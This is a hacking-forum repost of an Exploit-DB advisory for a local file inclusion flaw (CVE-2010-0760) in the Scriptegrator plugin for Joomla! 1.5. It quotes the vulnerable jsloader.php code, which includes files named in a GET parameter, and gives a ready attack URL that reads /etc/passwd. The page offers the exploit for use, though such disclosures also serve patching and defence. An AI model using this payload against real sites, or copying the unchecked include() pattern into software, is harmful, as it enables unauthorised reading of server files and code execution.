Exploit Joomla! Plugin Core Design Scriptegrator - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11498
Проверка EDB
  1. Пройдено
Автор
S2 CREW
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-0760 cve-2010-0759
Дата публикации
2010-02-18
Код:
# Exploit Title: Core Design Scriptegrator plugin for Joomla! 1.5 file inclusion
# Author: S2 Crew [Hungary]
# Tested on: Debian Linux, Apache, Joomla! 1.5

# Code:

There's a file called jsloader.php which takes an array of file names
from the HTTP GET parameters and calls include() on every one of them.

-----------------8<-----------------------------------------------
<?php
/**
 * Core Design Scriptegrator plugin for Joomla! 1.5
 */

define('DS', DIRECTORY_SEPARATOR);
$dir = dirname(__FILE__);

$files = array();
if (isset($_GET['files']) && $_GET['files']) $files = $_GET['files'];

if (extension_loaded('zlib') && !ini_get('zlib.output_compression')) @ob_start('ob_gzhandler');

header("Content-type: application/x-javascript");
header('Cache-Control: must-revalidate');
header('Expires: ' . gmdate('D, d M Y H:i:s', time() + 86400) . ' GMT');

foreach ($files as $file) {
        if (is_file($file)) {
                include($file);
                echo "\n";
        }
}
?>
-----------------8<-----------------------------------------------

The problem is that the only protection is the is_file() call (therefore it cannot
be used for remote file inclusion), so it's trivial to exploit this vulnerability to
execute the PHP interpreter on any file on the target system the httpd user can read.

Example:
http://server/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
 
Источник
www.exploit-db.com

Похожие темы